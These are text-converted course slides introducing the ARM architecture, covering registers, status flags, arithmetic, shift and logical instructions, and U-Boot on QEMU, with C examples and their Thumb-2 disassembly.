Introduction To ARM Systems-11!17!2012

This document provides an introduction to the ARM (Acorn/Advanced RISC Machines) architecture. It discusses the history and development of ARM, the different ARM architecture versions, key features like registers and instruction cycles. It also outlines the tools that will be used like the GCC compiler and GAS assembler. The schedule includes labs on topics like Fibonacci, atomic operations and interrupts. QEMU will be used to emulate an ARM Cortex-A9 board for hands-on exercises including booting Linux with u-boot.

Uploaded by

AchintyaDesai

Introduction to ARM (Acorn/Advanced RISC Machines)

Gananand Kini

June 18 2012
Acknowledgements
Prof. Rajeev Gandhi, Dept. ECE, Carnegie Mellon University
Prof. Dave O'Hallaron, School of CS, Carnegie Mellon University
Xeno Kovah
Dana Hutchinson
Dave Keppler
Jim Irving
Dave Weinstein
Geary Sutterfield
...
Co-requisites
Intro x86
Intermediate x86 - would be very helpful
Book(s)
"ARM System Developer's Guide: Designing and Optimizing System Software" by Andrew N. Sloss, Dominic Symes, and Chris Wright
Schedule
Day 1 Part 1
  Intro to ARM basics
  Lab 1 (Fibonacci Lab)
Day 1 Part 2
  More of ARM's features
  Lab 2 (BOMB Lab)
Day 2 Part 1
  ARM hardware features
  Lab 3 (Interrupts lab)
Day 2 Part 1.5
  GCC optimization
  Lab 4 (Control Flow Hijack Lab)
Day 2 Part 2
  Inline and Mixed assembly
  Atomic instructions
  Lab 5 (Atomic Lab)

DAY 1 PART 1
Introduction
Started as a hobby in microcontrollers in high school with robotics
Background in software development and electrical engineering
In school, took many courses related to microcontrollers and computer architecture
Small amount of experience with assembly
Obligatory XKCD
Source: http://xkcd.com/676/
Short Review
short ByteMyShorts[2] = {0x3210, 0x7654} in little endian?
Answer: 0x10325476
int NibbleMeInts = 0x4578 in binary, in octal? (no endianness involved)
Answers: 0b0100 0101 0111 1000
0b0 100 010 101 111 000
0o42570 (Take 3 bits of binary and represent in decimal)
Twos complement of 0x0113
Answer: 0xFEED
What does the following code do? (Part of output from gcc at O3)
movl (%rsi), %edx
movl (%rdi), %eax
xorl %edx, %eax
xorl %eax, %edx
xorl %edx, %eax
movl %edx, (%rsi)
movl %eax, (%rdi)
ret

How can we optimize above for code size?
Could this macro be used for atomic operations?
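The review answers above can be checked with a few lines of C. The sketch below is only an illustration: the function names `xor_swap` and `twos_complement16` are made up for this example and do not come from the course material. `xor_swap` follows the same three XOR steps as the disassembly, and `twos_complement16` inverts the bits and adds one.

```c
#include <stdint.h>

/* Hypothetical helper: swaps two values using the same three XORs
 * as the xorl sequence in the listing (load, xor, xor, xor, store). */
void xor_swap(uint32_t *a, uint32_t *b)
{
    uint32_t x = *a;   /* movl (%rdi), %eax */
    uint32_t y = *b;   /* movl (%rsi), %edx */
    x ^= y;            /* xorl %edx, %eax   */
    y ^= x;            /* xorl %eax, %edx   */
    x ^= y;            /* xorl %edx, %eax   */
    *b = y;            /* movl %edx, (%rsi) */
    *a = x;            /* movl %eax, (%rdi) */
}

/* Hypothetical helper: two's complement of a 16-bit value
 * (invert every bit, then add one). */
uint16_t twos_complement16(uint16_t v)
{
    return (uint16_t)(~v + 1u);
}
```

Because both values are loaded into locals before any XOR, the swap still behaves when both pointers refer to the same object; the load and store are separate steps, which is worth keeping in mind for the atomicity question.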
We'll learn how and why
int main(void) {
    printf("Hello world!\n");
    return 0;
}
This turns into...
And then into the following
Generated using objdump
Introduction to ARM
Acorn Computers Ltd. (Cambridge, England) Nov. 1990
First called Acorn RISC Machine, then Advanced RISC Machine
Based on RISC architecture work done at UCal Berkeley and Stanford
ARM only sells licenses for its core architecture design
Optimized for low power & performance
VersatileExpress board with Cortex-A9 (ARMv7) core will be "emulated" using Linaro builds.
This also means some things may not work. You've been warned.

ARM architecture versions
Architecture | Family
ARMv1 | ARM1
ARMv2 | ARM2, ARM3
ARMv3 | ARM6, ARM7
ARMv4 | StrongARM, ARM7TDMI, ARM9TDMI
ARMv5 | ARM7EJ, ARM9E, ARM10E, XScale
ARMv6 | ARM11, ARM Cortex-M
ARMv7 | ARM Cortex-A, ARM Cortex-M, ARM Cortex-R
ARMv8 | Not available yet. Will support 64-bit addressing + data
"ARM Architecture." Wikipedia, The Free Encyclopedia. Wikimedia Foundation, Inc. 3 March 2012. Web. 3 March 2012.
ARM Extra Features
Similar to RISC architecture (not purely RISC)
  Variable cycle instructions (LD/STR multiple)
  Inline barrel shifter
  16-bit (Thumb) and 32-bit instruction sets combined called Thumb2
  Conditional execution (reduces number of branches)
  Auto-increment/decrement addressing modes
  Changed to a Modified Harvard architecture since ARM9 (ARMv5)
Extensions (not covered in this course):
  TrustZone
  VFP, NEON & SIMD (DSP & Multimedia processing)
Registers
Total of 37 registers available (including banked registers):
  30 general purpose registers
  1 PC (program counter)
  1 CPSR (Current Program Status Register)
  5 SPSR (Saved Program Status Register)
    The saved CPSR for each of the five exception modes
Several exception modes
For now we will refer to "User" mode
Registers
r0, r1, r2, r3, r4, r5, r6, r7, r8, r9, r10 (SL), r11 (FP), r12 (IP), r13 (SP), r14 (LR), r15 (PC), CPSR

Stack Pointer (SP) - The address of the top element of stack.

Link Register (LR) - Register used to save the PC when entering a subroutine.

Program Counter (PC) - The address of next instruction. (ARM mode points to current+8 and Thumb mode points to current+4)

Current Program Status Register (CPSR) - Results of most recent operation including Flags, Interrupts (Enable/Disable) and Modes

R12 or IP is not instruction pointer, it is the intra procedural call scratch register

Instruction cycle
Start
Fetch - fetch next instruction from memory
Decode - decode fetched instruction
Execute - execute fetched instruction
End
ARM vs. x86
Endianness (Bi-Endian)
  Instructions are little endian (except on the -R profile for ARMv7 where it is implementation defined)
  Data endianness can be mixed (depends on the E bit in CPSR)
Fixed length instructions
  Instruction operand order is generally: OP DEST, SRC (destination first, as in Intel syntax on x86; AT&T syntax puts the source first)
Short instruction execution times
Register differences (CPSR, SPSR...)
  Has a few extra registers
  Operations only on registers not memory (Load/Store architecture)
Pipelining & Interrupts
Exceptions
Processor Modes
Code & Compiler optimizations due to the above differences
ARM Data sizes and instructions
ARMs mostly use 16-bit (Thumb) and 32-bit instruction sets
32-bit architecture
Byte = 8 bits (Nibble is 4 bits) [byte or char in x86]
Half word = 16 bits (two bytes) [word or short in MS x86]
Word = 32 bits (four bytes) [Doubleword or int/long in MS x86]
Double Word = 64 bits (eight bytes) [Quadword or double/long long in MS x86]
Source: http://stackoverflow.com/questions/39419/visual-c-how-large-is-a-dword-with-32-and-64-bit-code
The Life of Binaries
Starts with c or cpp source code written by us
A compiler takes the source code and generates assembly instructions
An assembler takes the assembly instructions and generates objects or .o files with machine code
The linker takes objects and arranges them for execution and generates an executable. (A dynamic linker will insert object code during runtime in memory)
A loader prepares the binary code and loads it into memory for OS to run
The tools we will use
Compiler - gcc for ARM
Assembler - gcc or as (gas) for ARM
Linker - gcc for ARM or gold
Loader - gcc for ARM and ld-linux for ARM
At Power on...
ROM has code that has been burned in by SoC vendor (similar to BIOS but not the same)
Use of memory mapped IO
  different memory components (can be a mix of ROM, SRAM, SDRAM etc.)
Contains
  Code for memory controller setup
  Hardware and peripheral init (such as clock and timer)
  A boot loader such as Fastboot, U-boot, X-Loader etc.
U-Boot process
Source: Balducci, Francesco. http://balau82.wordpress.com/2010/04/12/booting-linux-with-u-boot-on-qemu-arm/
U-boot exercise on a Versatile PB
Run the following in ~/projects/uboot-exercise:
qemu-system-arm -M versatilepb -m 128M -kernel flash.bin -serial stdio
flash.bin contains:
  U-boot binary (at 0x10000 in image)
  a root filesystem (at 0x210000 in image)
  the linux kernel (at 0x410000 in image)
U-boot has bootm <address> to boot code
Source: Balducci, Francesco. http://balau82.wordpress.com/2010/04/12/booting-linux-with-u-boot-on-qemu-arm/
U-boot exercise
U-boot was patched in earlier example b/c it did not support ramdisk usage with bootm command. Good 'nough for simulation.
U-boot uses bootm <kernel address> <rootfs image address> to boot
U-boot relocates itself to specific address (0x1000000) before loading kernel.
Source: Balducci, Francesco. http://balau82.wordpress.com/2010/04/12/booting-linux-with-u-boot-on-qemu-arm/
PBX w/ Cortex-A9 Memory Map
Source: http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.dui0440b/Bbajihec.html
Cortex M3 Memory Map
Source: http://www.joral.ca/blog/wp-content/uploads/2009/10/CortexPrimer.pdf
ARM Architecture
Source: http://www.arm.com/files/pdf/armcortexa-9processors.pdf
Instruction cycle
Start
Fetch - fetch next instruction from memory
Decode - decode fetched instruction
Execute - execute fetched instruction
End
Behavior of the PC/R15
PC - Program counter (like the x86 EIP) has the address of next instruction to execute
When executing an ARM instruction, PC reads as the address of current instruction + 8
When executing a Thumb instruction, PC reads as the address of current instruction + 4
When PC is written to, it causes a branch to the written address
Thumb instructions cannot access/modify PC directly
That means...

00008380 <add>:
8380: b480 push {r7}
8382: b083 sub sp, #12
8384: af00 add r7, sp, #0
8386: 6078 str r0, [r7, #4]
8388: 6039 str r1, [r7, #0]
838a: 687a ldr r2, [r7, #4]
838c: 683b ldr r3, [r7, #0]
838e: 18d3 adds r3, r2, r3
8390: 4618 mov r0, r3
8392: f107 070c add.w r7, r7, #12
8396: 46bd mov sp, r7
8398: bc80 pop {r7}
839a: 4770 bx lr
When executing instruction @ 0x8382
PC=0x00008386
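The PC read rule can be written as a one-line calculation. This is a minimal sketch, assuming a hypothetical helper name `pc_read_value`; it only restates the +8 (ARM) and +4 (Thumb) offsets given above.

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical helper: the value an instruction observes when it reads PC.
 * ARM state reads current address + 8, Thumb state reads current address + 4. */
uint32_t pc_read_value(uint32_t instr_addr, bool thumb)
{
    return instr_addr + (thumb ? 4u : 8u);
}
```

For the Thumb instruction at 0x8382 in the listing, `pc_read_value(0x8382, true)` gives 0x8386, matching the value quoted on the slide.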
ARM Assembly and some conventions
Now uses Unified Assembly Language (combines ARM & Thumb instruction sets and code allowed to have intermixed instructions)
General form (there are exceptions to this):
<Instruction><Conditional>{S bit} <destination> <source> <Shift/operand/immediate value>
Load/Store architecture means instructions only operate on registers, NOT memory
Most of the instructions expect destination first followed by source, but not all.
ARM Assembly and some conventions contd.
<dst> will be destination register
<src> will be source register
<reg> will be any specified register
<imm> will be immediate value
<reg|cxfz..> whatever follows '|' means with the specified flag enabled
Conditional Flags
Indicate information about the result of an operation
N - Negative result received from ALU (Bit 31 of the result if it is two's complement signed integer)
Z - Zero flag (1 if result is zero)
C - Carry generated by ALU
V - overflow generated by ALU (1 means overflow)
Q - overflow or saturation generated by ALU (Sticky flag; set until CPSR is overwritten manually)
Flags are in a special register called CPSR (Current Program Status Register)
Flags are not updated unless used with a suffix of S on instruction
Current/Application Program Status Register (CPSR/APSR)
Bit:    31  30  29  28  27  26-10         9  8  7  6  5  4-0
Field:  N   Z   C   V   Q   (unlabeled)   E  A  I  F  T  MODE
N Negative flag
Z Zero flag
C Carry flag
V Overflow flag
Q Sticky overflow
I 1: Disable IRQ mode
F 1: Disable FIQ mode
T 0: ARM state
1: Thumb state
_MODE Mode bits
Push and Pop operations
PUSH <reg list> - decrements the SP and stores the value in <reg list> at that location
POP <reg list> - Stores the value at SP into <reg list> and increments the SP
Both operations only operate on SP
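The push and pop behaviour described above (decrement then store, load then increment) can be sketched in C with a small array standing in for stack memory. Everything here is an assumption made for illustration: the `cpu` struct, the `STACK_WORDS` size, and the use of a word index instead of a byte address. There is no bounds checking.

```c
#include <stdint.h>

#define STACK_WORDS 16   /* illustrative size only */

/* Toy model: sp is an index into stack[], counted in 32-bit words. */
struct cpu {
    uint32_t stack[STACK_WORDS];
    uint32_t sp;
};

/* PUSH one register: decrement SP, then store at the new top. */
void push(struct cpu *c, uint32_t value)
{
    c->sp -= 1;
    c->stack[c->sp] = value;
}

/* POP one register: load from the top, then increment SP. */
uint32_t pop(struct cpu *c)
{
    uint32_t value = c->stack[c->sp];
    c->sp += 1;
    return value;
}
```

A `push {r7, lr}` would correspond to `push(&c, lr); push(&c, r7);` in this model, since the lowest-numbered register ends up at the lowest address.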
PUSH operation
[Figure: stack memory from 0x7EFFF950 to 0x7EFFF95C and registers R7 = 0x0A0B0C0D, LR = 0x00008010, shown before and after INSTRUCTION: push {r7, lr}]
Arithmetic operations
ADD: add
  <dst> = <src> + <imm> or <src> + <reg>
ADC: add with carry
  <dst> = <src|c> + <imm> or <src|c> + <reg>
SUB: subtract
  <dst> = <src> - <imm> or <src> - <reg>
SBC: subtract with carry
  <dst> = <src|c> - <imm> or <src|c> - <reg>
RSB: reverse subtract
  <dst> = <imm> - <src> or <reg> - <src>
RSC: reverse subtract with carry
  <dst> = <imm|c> - <src> or <reg|c> - <src>
Closer look at Example 1.c
int main(void) {
int a, b, c;
a=10;
b=12;
c=add(a,b);
return 0;
}

int add(int a, int b)
{
return a+b;
}
00008354 <main>:
8354: b580 push {r7, lr}
8356: b084 sub sp, #16
8358: af00 add r7, sp, #0
835a: f04f 030a mov.w r3, #10
835e: 607b str r3, [r7, #4]
8360: f04f 030c mov.w r3, #12
8364: 60bb str r3, [r7, #8]
8366: 6878 ldr r0, [r7, #4]
8368: 68b9 ldr r1, [r7, #8]
836a: f000 f809 bl 8380 <add>
836e: 60f8 str r0, [r7, #12]
8370: f04f 0300 mov.w r3, #0
8374: 4618 mov r0, r3
8376: f107 0710 add.w r7, r7, #16
837a: 46bd mov sp, r7
837c: bd80 pop {r7, pc}
837e: bf00 nop

00008380 <add>:
8380: b480 push {r7}
8382: b083 sub sp, #12
8384: af00 add r7, sp, #0
8386: 6078 str r0, [r7, #4]
8388: 6039 str r1, [r7, #0]
838a: 687a ldr r2, [r7, #4]
838c: 683b ldr r3, [r7, #0]
838e: 18d3 adds r3, r2, r3
8390: 4618 mov r0, r3
8392: f107 070c add.w r7, r7, #12
8396: 46bd mov sp, r7
8398: bc80 pop {r7}
839a: 4770 bx lr
The highlighted instruction is a special form of SUB. In this case it means:
SP = SP - 16

Thumb instructions are intermixed with ARM instructions.
SBC & RSB operations
INSTRUCTION: | sbc r0, r0, r1 | rsb r0, r0, r1
MEANS: | r0 = r0 - r1 - NOT(C) | r0 = r1 - r0 (no flags updated)
Before Operation
R0 | 0x0000000A | 0x0000000A
R1 | 0x0A0B0C0D | 0x0A0B0C0D
CPSR | 0x20000010 | 0x20000010
After Operation
R0 | 0xF5F4F3FD | 0x0A0B0C03
R1 | 0x0A0B0C0D | 0x0A0B0C0D
CPSR | 0x20000010 | 0x20000010
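The before/after values for SBC and RSB can be reproduced with plain unsigned arithmetic. This is a sketch under the assumption that the helpers `sbc` and `rsb` (names chosen here for illustration) model only the result register, not the flags.

```c
#include <stdint.h>

/* SBC: rn - op2 - NOT(C). With the carry flag set, nothing extra is subtracted. */
uint32_t sbc(uint32_t rn, uint32_t op2, unsigned carry)
{
    return rn - op2 - (carry ? 0u : 1u);
}

/* RSB: reverse subtract, op2 - rn. */
uint32_t rsb(uint32_t rn, uint32_t op2)
{
    return op2 - rn;
}
```

With R0 = 0x0000000A, R1 = 0x0A0B0C0D and the C bit set (CPSR = 0x20000010), `sbc` yields 0xF5F4F3FD and `rsb` yields 0x0A0B0C03.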
Arithmetic operations part 2
MUL: <dst> = <reg1> * <reg2>
MLA: <dst> = (<reg1> * <reg2>) + <reg3>
  MLA{S}<c> <Rd>, <Rn>, <Rm>, <Ra> where <Rd> is destination register, <Rn> & <Rm> are the first and second operands respectively and <Ra> is the addend register
MLS: <dst> = <reg3> - (<reg1> * <reg2>)
Multiply operations only store least significant 32 bits of result into destination
Result is not dependent on whether the source register values are signed or unsigned values

example2.c
000083b8 <multiply>:
83b8: fb01 f000 mul.w r0, r1, r0
83bc: 4770 bx lr
83be: bf00 nop

000083c0 <multiplyadd>:
83c0: fb01 2000 mla r0, r1, r0, r2
83c4: 4770 bx lr
83c6: bf00 nop
int main(void) {
    int a, b, c, d;
    a=2;
    b=3;
    c=4;
    d = multiply(a,b);
    printf("a * b is %d\n", d);
    d = multiplyadd(a,b,c);
    printf("a * b + c is %d\n", d);
    return 0;
}

int multiply(int a, int b)
{
    return (a*b);
}

int multiplyadd(int a, int b, int c)
{
    return ((a*b)+c);
}
MLA & MLS operations
INSTRUCTION: | mla r0, r0, r1, r2 | mls r0, r0, r1, r2
MEANS: | r0 = r0 * r1 + r2 | r0 = r2 - (r0 * r1) (no flags updated)
Before Operation
R0 | 0x0000000A | 0x0000000A
R1 | 0x0000000E | 0x0000000E
R2 | 0x00000003 | 0x00000003
CPSR | 0x20000010 | 0x20000010
After Operation
R0 | 0x0000008F | 0xFFFFFF77
R1 | 0x0000000E | 0x0000000E
R2 | 0x00000003 | 0x00000003
CPSR | 0x20000010 | 0x20000010
Arithmetic operations part 3
SDIV - Signed divide
UDIV - Unsigned divide
On the Cortex-A profile there is no divide operation
PLEASE NOTE: These instructions are only available on Cortex-R profile
Example x.s
000083e4 <divide>:
83e4: e710f110 sdiv r0, r0, r1
83e8: e12fff1e bx lr
83ec: e1a00000 nop ; (mov r0, r0)

000083f0 <unsigneddivide>:
83f0: e730f110 udiv r0, r0, r1
83f4: e12fff1e bx lr
83f8: e1a00000 nop ; (mov r0, r0)
Using the emulator
cd ~/projects/linaro
./startsim
Password is passw0rd
To copy <localfile> to </path/to/file> on emulator:
scp -P 2200 <localfile> root@localhost:</path/to/file>
To copy </path/to/file> from emulator to <localfile>:
scp -P 2200 root@localhost:</path/to/file> <localfile>
objdump introduction
dumps the objects in an ELF (Executable Linkable Format) file.
objects that are in a form before they are linked
-g gdb option for gcc adds debug symbols that objdump can read
-d option for objdump used for disassembling (get assembly code from the ELF format)
objdump usage
int main(void) {
    printf("Hello world!\n");
    return 0;
}
helloworld.c
objdump -d helloworld | less
Try dividing now on the emulator
Goto ~/projects/examples
Copy example1 to divexample
Replace the add() function in example1.c with divide and return (a/b)
Run make clobber && make
Disassemble...
objdump -d example1 | less
What do you see?
NOP Instruction
A most interesting instruction considering it does nothing
ARM Reference Manual mentions that this instruction does not relate to code execution time (It can increase, decrease or leave the execution time unchanged). Why?
Primary purpose is for instruction alignment. (ARM and Thumb instructions together... What could go wrong?)
Can also be used as part of vector tables
In some microcontrollers, it is also used for synchronization of pipeline.
Barrel Shifter
Hardware optimization inline with the ALU allows for a multiplier (power of 2) within same instruction cycle
Allows for shifting a register value by either an unsigned integer (MAXVAL of 32) or a value specified in bottom byte of another register.
ASR - Arithmetic Shift Right (MSB copied at left, last bit off right is Carry)
LSL - Logical Shift Left (0s at right, last bit off left is Carry)
  MOV R7, R5, LSL #2 means (R7=R5*4) or (R5<<2)
  ADD R0, R1, R1, LSL #1 means R0=R1+(R1<<1)
LSR - Logical Shift Right (0s at left, last bit off right is Carry)
ROR - Rotate Right (bits popped off the right end are directly pushed into left, last bit off right is Carry)
RRX - Rotate Right with Extend (bits popped off the right end first go into Carry, Carry is shifted in to left, last bit off right is Carry)
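The shift and rotate types listed above can be modelled in C on 32-bit values. This is a rough sketch with invented function names; it assumes shift amounts of 0 to 31 for the plain shifts and does not model the carry flag except for the carry in and carry out of RRX.

```c
#include <stdint.h>

/* Logical shift left: zeros enter on the right (n in 0..31). */
uint32_t lsl(uint32_t x, unsigned n) { return x << n; }

/* Logical shift right: zeros enter on the left (n in 0..31). */
uint32_t lsr(uint32_t x, unsigned n) { return x >> n; }

/* Arithmetic shift right: the sign bit is copied in on the left (n in 0..31). */
uint32_t asr(uint32_t x, unsigned n)
{
    uint32_t shifted = x >> n;
    if ((x >> 31) != 0 && n > 0)
        shifted |= ~(UINT32_MAX >> n);   /* fill the vacated top bits with 1s */
    return shifted;
}

/* Rotate right: bits leaving on the right re-enter on the left. */
uint32_t ror(uint32_t x, unsigned n)
{
    n &= 31u;
    return n ? (x >> n) | (x << (32u - n)) : x;
}

/* Rotate right with extend: a one-bit rotate through the carry flag. */
uint32_t rrx(uint32_t x, unsigned carry_in, unsigned *carry_out)
{
    *carry_out = x & 1u;                                   /* bit 0 becomes the new carry */
    return (x >> 1) | ((uint32_t)(carry_in & 1u) << 31);   /* old carry enters at bit 31 */
}
```

As on the slide, `r1 + lsl(r1, 1)` computes 3 * r1 in a single add-with-shift, which is the kind of multiply-by-constant the barrel shifter makes cheap.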
Hints on how to RTFM
{S} - updates flags in the CPSR
<c> - allows mnemonic of conditional to be added
<q> - instruction suffix with either:
  .N Narrow, assembler must use 16-bit encoding for the instruction
  .W Wide, assembler must use 32-bit encoding for the instruction
Do not use the .N or .W in your assembly code. As per manual, it will throw errors. GNU Assembler decides on encoding depending on options selected.
Example 3.1.c
int main(void)
{
int a, b, d;
a = 6;
b = 8;
d = multiplybytwo(a) * multiplybytwo(b);
printf("2a * 2b is %d\n", d);

return 0;
}

int multiplybytwo(int a)
{
return a*2;
}
00008318 <main>:
8318: b508 push {r3, lr}
831a: 2001 movs r0, #1
831c: 22c0 movs r2, #192 ; 0xc0
831e: f248 4100 movw r1, #33792 ; 0x8400
8322: f2c0 0100 movt r1, #0
8326: f7ff efec blx 8300 <_init+0x3c>
832a: 2000 movs r0, #0
832c: bd08 pop {r3, pc}
832e: bf00 nop
000083a8 <multiplybytwo>:
83a8: 0040 lsls r0, r0, #1
83aa: 4770 bx lr
Example 3.2.c
int main(void)
{
int a, b, d;
a = -6;
b = 8;
d = dividebytwo(a) / dividebytwo(b);
printf("a/2 / b/2 is %d\n", d);

return 0;
}

int dividebytwo(int a)
{
return a/2;
}
00008318 <main>:
8318: b508 push {r3, lr}
831a: 2001 movs r0, #1
831c: 2200 movs r2, #0
831e: f248 4104 movw r1, #33796 ; 0x8404
8322: f2c0 0100 movt r1, #0
8326: f7ff efec blx 8300 <_init+0x3c>
832a: 2000 movs r0, #0
832c: bd08 pop {r3, pc}
832e: bf00 nop

000083a8 <dividebytwo>:
83a8: eb00 70d0 add.w r0, r0, r0, lsr #31
83ac: 1040 asrs r0, r0, #1
83ae: 4770 bx lr
Example 3.2.c
[Figure: R0, R1, R2 and CPSR before and after each instruction below; R0 is shown as 0xFFFFFFF8 before the add.w, 0xFFFFFFF9 after it, and 0xFFFFFFFC after the asrs.]
add.w r0, r0, r0, lsr #31
asrs r0, r0, #1
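The two-instruction sequence in dividebytwo adds the sign bit before shifting so that negative values round toward zero, as C division requires. The sketch below mirrors those two steps; `divide_by_two` is a name chosen for this example, and the arithmetic shift is written out portably because right-shifting a negative int is implementation-defined in C.

```c
#include <stdint.h>

/* Hypothetical model of: add.w r0, r0, r0, lsr #31 ; asrs r0, r0, #1 */
int32_t divide_by_two(int32_t a)
{
    int32_t sign = (int32_t)((uint32_t)a >> 31);   /* lsr #31: 1 if a is negative */
    int32_t biased = a + sign;                     /* add the sign bit */

    /* arithmetic shift right by one, spelled out for negative inputs */
    return biased < 0 ? ~(~biased >> 1) : biased >> 1;
}
```

Without the bias, an arithmetic shift alone would turn -7 into -4 (rounding down), whereas `-7 / 2` in C is -3.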
RRX & LSL operation
INSTRUCTION: | mvn r0, r0, RRX | add r0, r0, r1, LSL #4
MEANS: | r0 = ~r0 >> 1 | r0 = r0 + (r1 * 16) (no flags updated)
Before Operation
R0 | 0x0000000A | 0x0000000A
R1 | 0x0000000E | 0x0000000E
R2 | 0x00000003 | 0x00000003
CPSR | 0x20000010 | 0x20000010
After Operation
R0 | 0xFFFFFFFA | 0x000000EA
R1 | 0x0000000E | 0x0000000E
R2 | 0x00000003 | 0x00000003
CPSR | 0xA0000010 | 0x20000010
More Data operations
MOV - move value from one register to another
Combine with postfixes to modify:
  MOVT: Moves only top half word into destination without changing lower half word
  MOVS PC,<reg>: Moves value into destination register and updates CPSR flags
MVN - Bitwise NOT of value into destination register
Cannot be used on memory locations
Example 4.c
int main(void)
{
int a, b, d;
a = 221412523;
b = 3;
d = multiply(a,b);
printf("a * b is %d\n", d);

return 0;
}

int multiply(int a, int b)
{
return (a*b);
}
00008318 <main>:
8318: b508 push {r3, lr}
831a: 2001 movs r0, #1
831c: f248 4108 movw r1, #33800 ; 0x8408
8320: f247 6201 movw r2, #30209 ; 0x7601
8324: f2c0 0100 movt r1, #0
8328: f2c2 7297 movt r2, #10135 ; 0x2797
832c: f7ff efe8 blx 8300 <_init+0x3c>
8330: 2000 movs r0, #0
8332: bd08 pop {r3, pc}

000083ac <multiply>:
83ac: fb01 f000 mul.w r0, r1, r0
83b0: 4770 bx lr
83b2: bf00 nop
221412523*3 = 664237569 or 0x27977601
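In the listing the compiler folded the multiplication into a constant and built it in r2 with a movw/movt pair. A small sketch of what that pair does, using helper names `movw` and `movt` that are only stand-ins for the instructions:

```c
#include <stdint.h>

/* movw: write a 16-bit immediate to the low half and zero the top half. */
uint32_t movw(uint16_t imm16)
{
    return imm16;
}

/* movt: replace only the top half, leaving the low half untouched. */
uint32_t movt(uint32_t reg, uint16_t imm16)
{
    return (reg & 0x0000FFFFu) | ((uint32_t)imm16 << 16);
}
```

`movt(movw(0x7601), 0x2797)` gives 0x27977601, the same value as 221412523 * 3.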
Example 6.c
Before the subtraction operation

CPSR = 0x60000010

After the subtraction operation

CPSR = 0x80000010
0000838c <main>:
838c: b590 push {r4, r7, lr}
838e: b085 sub sp, #20
8390: af00 add r7, sp, #0
8392: f04f 0306 mov.w r3, #6
8396: 60fb str r3, [r7, #12]
8398: f3ef 8400 mrs r4, CPSR
839c: 60bc str r4, [r7, #8]
839e: 68fa ldr r2, [r7, #12]
83a0: f243 535d movw r3, #13661 ; 0x355d
83a4: f6cf 73fd movt r3, #65533 ; 0xfffd
83a8: 18d3 adds r3, r2, r3
83aa: 607b str r3, [r7, #4]
83ac: f3ef 8400 mrs r4, CPSR
83b0: 603c str r4, [r7, #0]
83b2: f248 4344 movw r3, #33860 ; 0x8444
83b6: f2c0 0300 movt r3, #0
83ba: 4618 mov r0, r3
83bc: 6879 ldr r1, [r7, #4]
...
int main(void)
{
int a, b;
a = 6;
. . .
// Important: Subtraction taking place
b = a - 182947;
. . .
printf("a's negatory is %d\n", b);

return 0;
}
Reversing byte order
REV - reverses byte order (& endianness) of value in register and stores into destination register
REV16 - reverses byte order of each 16-bit halfword in register and stores into destination register
REVSH - reverses byte order of lower 16-bit halfword in register, sign extends to 32 bits and stores into destination register
REV & REV16 operations
INSTRUCTION: | rev r0, r0 | rev16 r0, r0
Before Operation
R0 | 0xABCDDEFF | 0xABCDDEFF
CPSR | 0x20000010 | 0x20000010
After Operation
R0 | 0xFFDECDAB | 0xCDABFFDE
CPSR | 0x20000010 | 0x20000010
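The three byte-reversal instructions can be expressed with shifts and masks. This is a sketch with function names chosen to match the mnemonics; the final conversion in `revsh` relies on the usual two's complement behaviour when narrowing to `int16_t`, which is an assumption about the compiler rather than something the C standard guarantees before C23.

```c
#include <stdint.h>

/* REV: reverse all four bytes of a word. */
uint32_t rev(uint32_t x)
{
    return (x >> 24) | ((x >> 8) & 0x0000FF00u) |
           ((x << 8) & 0x00FF0000u) | (x << 24);
}

/* REV16: swap the two bytes inside each 16-bit halfword. */
uint32_t rev16(uint32_t x)
{
    return ((x >> 8) & 0x00FF00FFu) | ((x << 8) & 0xFF00FF00u);
}

/* REVSH: swap the bytes of the low halfword, then sign extend to 32 bits. */
int32_t revsh(uint32_t x)
{
    uint16_t swapped = (uint16_t)(((x & 0xFFu) << 8) | ((x >> 8) & 0xFFu));
    return (int16_t)swapped;
}
```

With R0 = 0xABCDDEFF these reproduce the values from the slide: `rev` gives 0xFFDECDAB and `rev16` gives 0xCDABFFDE.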
Current Program Status Register
Bit:    31  30  29  28  27  26-10         9  8  7  6  5  4-0
Field:  N   Z   C   V   Q   (unlabeled)   E  A  I  F  T  MODE
N Negative flag
Z Zero flag
C Carry flag
V Overflow flag
Q Sticky overflow
I 1: Disable IRQ mode
F 1: Disable FIQ mode
T 0: ARM state
1: Thumb state
_MODE Mode bits
Logical & Comparison operations
AND - Bitwise AND
BIC - Bitwise bit clear
EOR - Bitwise Exclusive OR
ORR - Bitwise OR
ORN - Bitwise OR NOT
CMP - Compare. SUB but with NO destination. (Same as SUBS)
CMN - Compare Negative. ADD but with NO destination. (Same as ADDS)
TEQ - Test Equivalence. Like EOR but with NO destination.
TST - Test. Like AND but with NO destination.
Example 7.1.c

000083d0 <and>:
83d0: 4008 ands r0, r1
83d2: 4770 bx lr
int main(void)
{
int a, b, d;
a = 221412523;
b = 374719560;

d = and(a,b);

printf("a & b is %d\n", d);

return 0;
}

int and(int a, int b)
{
return (a&b);
}
Example 7.2.c
000083d0 <orr>:
83d0: 4308 orrs r0, r1
83d2: 4770 bx lr
int main(void)
{
int a, b, d;
a = 221412523;
b = 374719560;

d = orr(a,b);

printf("a | b is %d\n", d);

return 0;
}

int orr(int a, int b)
{
return (a|b);
}
Example 7.3.c
0000838c <main>:
<prolog> ...
8392: f04f 0308 mov.w r3, #8
8396: 60bb str r3, [r7, #8]
8398: f04f 0309 mov.w r3, #9
839c: 607b str r3, [r7, #4]
839e: f3ef 8400 mrs r4, CPSR
83a2: 603c str r4, [r7, #0]
83a4: 68ba ldr r2, [r7, #8]
83a6: 687b ldr r3, [r7, #4]
83a8: 4053 eors r3, r2
83aa: 2b00 cmp r3, #0
83ac: dd05 ble.n 83ba <main+0x2e>
83ae: 68b8 ldr r0, [r7, #8]
83b0: 6879 ldr r1, [r7, #4]
83b2: f000 f829 bl 8408 <add>
83b6: 60f8 str r0, [r7, #12]
83b8: e004 b.n 83c4 <main+0x38>
83ba: 6878 ldr r0, [r7, #4]
83bc: 68b9 ldr r1, [r7, #8]
83be: f000 f831 bl 8424 <subtract>
83c2: 60f8 str r0, [r7, #12]
<contd>...
int main(void)
{
int a, b, d;
a = 8;
b = 9;

if((a ^ b) > 0)
d = add(a,b);
else
d = subtract(b,a);

printf("a & b is %d\n", d);

return 0;
}

int add(int a, int b)
{
return (a+b);
}

int subtract(int a, int b)
{
return (a-b);
}
BIC
BIC clears the bits specified in a mask
For example,
R0 = 0x57 or 0b0101 0111
R1 = 0x24 or 0b0010 0100
BIC <R2> <R0> <R1>
